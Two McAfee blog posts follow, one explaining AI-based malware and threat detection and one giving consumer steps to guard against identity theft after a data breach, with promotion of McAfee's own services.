Most of today’s antivirus and threat detection software leverages behavioral heuristic-based detection based on machine learning models to detect known malicious behavior. Traditional methods rely on data analytics to detect known threat signatures or footprints with incredible accuracy. However, these conventional methods do not account for new malicious code, otherwise known as zero-day malware, for which there is no known information available. AI is mission-critical to cybersecurity since it enables security software and providers to take a more intelligent approach to virus and malware detection. Unlike AI–backed software, traditional methods rely solely on signature-based software and data analytics.  

Similar to human-like reasoning, machine learning models follow a three-stage process to gather input, process it, and generate an output in the form of threat leads. Threat detection software can gather information from threat intelligence to understand known malware using these models. It then processes this data, stores it, and uses it to draw inferences and make decisions and predictions. Behavioral heuristic-based detection leverages multiple facets of machine learning, one of which is deep learning. 

Deep learning employs neural networks to emulate the function of neurons in the human brain. This architecture uses validation algorithms for crosschecking data and complex mathematical equations, which applies an “if this, then that” approach to reasoning. It looks at what occurred in the past and analyzes current and predictive data to reach a conclusion. As the numerous layers in this framework process more data, the more accurate the prediction becomes. 

Many antivirus and detection systems also use ensemble learning. This process takes a layered approach by applying multiple learning models to create one that is more robust and comprehensive. Ensemble learning can boost detection performance with fewer errors for a more accurate conclusion.  

Additionally, today’s detection software leverages supervised learning techniques by taking a “learn by example” approach. This process strives to develop an algorithm by understanding the relationship between a given input and the desired output. 

Machine learning is only a piece of an effective antivirus and threat detection framework. A proper framework combines new data types with machine learning and cognitive reasoning to develop a highly advanced analytical framework. This framework will allow for advanced threat detection, prevention, and remediation.  

How Can AI Help Cybersecurity? 

Online threats are increasing at a staggering pace. McAfee Labs observed an average of 588 malware threats per minute. These risks exist and are often exacerbated for several reasons, one of which is the complexity and connectivity of today’s world. Threat detection analysts are unable to detect new malware manually due to their high volume. However, AI can identify and categorize new malware based on malicious behavior before they get a chance to affect online users. AI–enabled software can also detect mutated malware that attempts to avoid detection by legacy antivirus systems.  

Today, there are more interconnected devices and online usage ingrained into people’s everyday lives. However, the growing number of digital devices creates a broader attack surface. In other words, hackers will have a higher chance of infiltrating a device and those connected to it. 

Additionally, mobile usage is putting online users at significant risk. Over 85% of the Canadian population owns a smartphone. Hackers are noticing the rising number of mobile users and are rapidly taking advantage of the fact to target users with mobile-specific malware. 

The increased online connectivity through various devices also means that more information is being stored and processed online. Nowadays, more people are placing their data and privacy in the hands of corporations that have a critical responsibility to safeguard their users’ data. The fact of the matter is that not all companies can guarantee the safeguards required to uphold this promise, ultimately resulting in data and privacy breaches. 

In response to these risks and the rising sophistication of the online landscape, security companies combine AI, threat intelligence, and data science to analyze and resolve new and complex cyber threats. AI-backed threat protection identifies and learns about new malware using machine learning models. This enables AI-backed antivirus software to protect online users more efficiently and reliably than ever before.  

Top 3 Benefits of AI-backed Threat Detection Software  

AI addresses numerous challenges posed by increasing malware complexity and volume, making it critical for online security and privacy protection. Here are the top 3 ways AI enhances cybersecurity to better protect online users.  

1. Effective threat detection 

The most significant difference between traditional signature-based threat detection methods and advanced AI-backed methods is the capability to detect zero-day malware. Functioning exclusively from either of these two methods will not result in an adequate level of protection. However, combining them results in a greater probability of detecting more threats with higher precision. Each method will ultimately play on the other’s strengths for a maximum level of protection. 

2. Enhanced vulnerability management 

AI enables threat detection software to think like a hacker. It can help software identify vulnerabilities that cybercriminals would typically exploit and flag them to the user. It also enables threat detection software to better pinpoint weaknesses in user devices before a threat has even occurred, unlike conventional methods. AI-backed security advances past traditional methods to better predict what a hacker would consider a vulnerability. 

2. Better security recommendations 

AI can help users understand the risks they face daily. An advanced threat detection software backed by AI can provide a more prescriptive solution to identifying risks and how to handle them. A better explanation results in a better understanding of the issue. As a result, users are more aware of how to mitigate the incident or vulnerability in the future.

Take a Smarter Approach to Security 

AI and machine learning are only a piece of an effective threat detection framework. A proper threat detection framework combines new data types with the latest machine learning capabilities to develop a highly advanced analytical framework. This framework will allow for better threat cyber threat detection, prevention, and remediation.

The post The What, Why, and How of AI and Threat Detection appeared first on McAfee Blog.

How to Protect Yourself From Identity Theft After a Data Breach

Did you just get word that your personal information may have been caught up in a data breach? If so, you can take steps to protect yourself from harm should your info get into the hands of a scammer or thief. 

How does that information get collected in the first place? We share personal information with companies for multiple reasons simply by going about our day—to pay for takeout at our favorite restaurant, to check into a hotel, or to collect rewards at the local coffee shop. Of course, we use our credit and debit cards too, sometimes as part of an online account that tracks our purchase history.  

In other words, we leave trails of data practically wherever we go these days, and that data is of high value to hackers. Thus, all those breaches we read about.  

Data breaches are a (sad) fact of life  

Whether it’s a major breach that exposes millions of records or one of many other smaller-scale breaches like the thousands that have struck healthcare providers, each one serves as a reminder that data breaches happen regularly and that we could find ourselves affected. Depending on the breach and the kind of information you’ve shared with the business or organization in question, information stolen in a breach could include:  

• Usernames and passwords  
• Email addresses  
• Phone numbers and home addresses  
• Contact information for friends and family members  
• Birthdays and driver’s license numbers  
• Credit and debit card numbers or bank account details  
• Purchase history and account activity  
• Social security numbers  

What do crooks do with that data? Several things. Apart from using it themselves, they may sell that data to other criminals. Either way, this can lead to illicit use of credit and debit cards, draining of bank accounts, claiming tax refunds or medical expenses in the names of the victims, or, in extreme cases, assuming the identity of others altogether.   

Examples of data breaches over the recent years  

In all, data is a kind of currency in of itself because it has the potential to unlock several aspects of victim’s life, each with its own monetary value. It’s no wonder that big breaches like these have made the news over the years, with some of the notables including:  

• U-Haul – 2022: A breach which accessed their customer contracts system between November 2021 and April 2022 exposed the names, driver’s license numbers, and state ID numbers of 2.2 million renters.  

• Los Angeles Unified School District – 2022: Hackers released 500 GB of highly sensitive information after a breach and when their subsequent ransomware demands were not met, exposing Social Security and passport numbers, health information, and psychological assessments of some students. 
• Facebook – 2021: Two sets of data exposed the records of more than 530 million users, including phone numbers, account names, and Facebook IDs. According to Facebook, the source of the breach dated back to 2019, at which time the flaw was remedied, even though the information was exposed in 2021. 
• Marriott International (Starwood) – 2018: Half a million guests had names, email and physical mailing addresses, phone numbers, passport numbers, Starwood Preferred Guest account information, dates of birth, and other information about their stays exposed.  
• Equifax – 2017: Some 147 million records that included names, addresses, dates of birth, driver’s license numbers, and Social Security Numbers were exposed, along with a relatively small subset of 200,000 victims having their credit card information exposed as well.  

As mentioned, these are big breaches with big companies that we likely more than recognize. Yet smaller and mid-sized businesses are targets as well, with some 43% of data breaches involving companies of that size. Likewise, restaurants and retailers have seen their Point-of-Sale (POS) terminals compromised, right on down to neighborhood restaurants.  

Staying secure in light of data breaches  

When a company experiences a data breach, customers need to realize that this could impact their online safety. If your favorite coffee shop’s customer database gets leaked, there’s a chance that your personal or financial information was exposed. However, this doesn’t mean that your online safety is doomed. If you think you were affected by a breach, you can take several steps to protect yourself from the potential side effects.   

1. Keep an eye on your bank and credit card accounts 

One of the most effective ways to determine whether someone is fraudulently using one or more of your accounts is to check your statements. If you see any charges that you did not make, report them to your bank or credit card company immediately. They have processes in place to handle fraud. While you’re with them, see if they offer alerts for strange purchases, transactions, or withdrawals.  

Our credit monitoring service can help you keep an eye on this. It monitors changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft. 

2. Monitor your identity with the help of a service

Breached and stolen information often ends up in dark web marketplaces where hackers, scammers, and thieves purchase it to commit yet more crime. Once it was difficult to know if your information was caught up in such marketplaces, yet now an identity monitoring service can do the detective work for you. 

Our service monitors the dark web for your personal info, including email, government IDs, credit card and bank account info, and more. This can help keep your personal info safe with early alerts that show you if your data is found on the dark web, an average of 10 months ahead of similar services.​ From there, you’ll get guidance that you can act on, which can help protect your info and accounts from theft. 

3. Place a fraud alert

If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity. You can place one fraud alert with any of the three major credit reporting agencies (Equifax, Experian, TransUnion) and they will notify the other two. A fraud alert typically lasts for a year, although there are options for extending it as well.  

4. Look into freezing your credit if needed 

Freezing your credit will make it highly difficult for criminals to take out loans or open new accounts in your name, as a freeze halts all requests to pull your credit—even legitimate ones. In this way, it’s a far stronger measure than placing a fraud alert. Note that if you plan to take out a loan, open a new credit card, or other activity that will prompt a credit report, you’ll need to take extra steps to see that through while the freeze is in place. (The organization you’re working with can assist with the specifics.) Unlike the fraud alert, you’ll need to contact each major credit reporting agency to put one in place. Also, a freeze lasts as long as you have it in place. You’ll have to remove it yourself, again with each agency.  

You can centrally manage this process with our security freeze service, which stops companies from looking at your credit profile, and thus halts the application process for loans, credit cards, utilities, new bank accounts, and more. A security freeze won’t affect your credit score. ​ 

5. Update your passwords 

Ensure that your passwords are strong and unique. Many people utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials, such as the one you’ll find in comprehensive online protection software.  

6. Consider taking out identity theft coverage 

If the unfortunate happens to you, an identity theft coverage & restoration service can help you get back on your feet. Ours offers $1 million in coverage for lawyer fees, travel expenses, and stolen funds reimbursement. It further provides support from a licensed recovery expert who can take the needed steps to repair your identity and credit. In all, it helps you recover the costs of identity theft along with the time and money it takes to recover from it. 

7. Clean up your personal data online

You can take this step any time, even if you haven’t been caught up in a data breach. The fact is that data broker companies collect and sell thousands of pieces of information on millions and millions of people worldwide, part of a global economy estimated at $200 billion U.S. dollars a year. And they’ll sell it to anyone—from advertisers for their campaigns, to scammers who will use it for spammy emails, texts, and calls, and to thieves who use that information for identity theft.  

Yet you can clean it up. Our personal data cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites and, with select products, even manage the removal for you. 

8. Use online protection software and expand your security toolbox 

Comprehensive online protection software will offer you the tools and services listed above, along with further features that can protect you online. That includes a VPN to keep your time online more private from online data collection while protecting it from thieves who’re out to steal credit card and account information. It also includes web browsing protection that can warn you of sketchy websites and malicious downloads that look to steal your information. In all, it’s thorough protection for your devices, privacy, and identity. And in a time of data breaches, that kind of protection has become essential.   

The post How to Protect Yourself From Identity Theft After a Data Breach appeared first on McAfee Blog.